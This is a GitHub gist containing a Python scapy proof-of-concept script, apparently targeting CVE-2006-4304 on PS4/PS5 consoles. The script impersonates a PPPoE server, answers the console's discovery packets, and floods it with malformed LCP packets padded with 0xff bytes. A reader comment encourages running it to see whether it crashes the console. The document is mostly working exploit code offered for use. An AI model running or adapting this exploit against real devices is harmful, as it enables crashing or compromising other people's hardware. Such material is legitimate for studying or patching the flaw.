Created
January 30, 2024 16:02
-
-
Save RobbedColek/8b0bc9655adc6ad9564ad71453188e37 to your computer and use it in GitHub Desktop.
PoC of CVE-2006-4304 for PS4/PS5
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from scapy.all import PPPoED, Ether, sniff, sendp, srp1, hexdump | |
| source = b"\xXX\xXX\xXX\xXX\xXX\xXX" # MAC address of your adapter on PC | |
| destination = b"\xXX\xXX\xXX\xXX\xXX\xXX" # MAC address of LAN on your PS4 | |
| interface = "Realtek PCIe 2.5GbE Family Controller #2" # get via "ipconfig /all" or eth0 or similiar on Linux | |
| packet = sniff(iface=interface, filter="pppoed", count=1) | |
| tag_value = packet[PPPoED][0].tag_list[1].tag_value | |
| payload = destination + source + b"\x88\x63\x11\x07\x00\x00\x00\x0c\x01\x03\x00\x08" + tag_value | |
| sendp(payload, iface=interface) | |
| packet = sniff(iface=interface, filter="pppoed", count=1) | |
| payload = destination + source + b"\x88\x63\x11\x65\x00\x01\x00\x0c\x01\x03\x00\x08" + tag_value | |
| sendp(payload, iface=interface) | |
| packet = sniff(iface=interface, filter="pppoes", count=1) | |
| payload = destination + source + b"\x88\x64\x11\x00\x00\x01\x00\x09\xc0\x21\x01\x01\x00\x07\xab\xff" | |
| packet = srp1(Ether(payload), iface=interface) | |
| print(hexdump(packet)) | |
| payload = destination + source + b"\x88\x64\x11\x00\x00\x01\x00\x09\xc0\x21\x01\x01\x00\x07\xab\xff" + b"\xff" * 256 # this number might be different, just a guess | |
| for i in range(20): | |
| sendp(payload, iface=interface) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
I actually don't know but I if it is .02 it's a small change so I don't think is the error patch, but I'm not truly sure, so the best thing you can guys do is test this script, if it crashes your console, the future exploit should work too.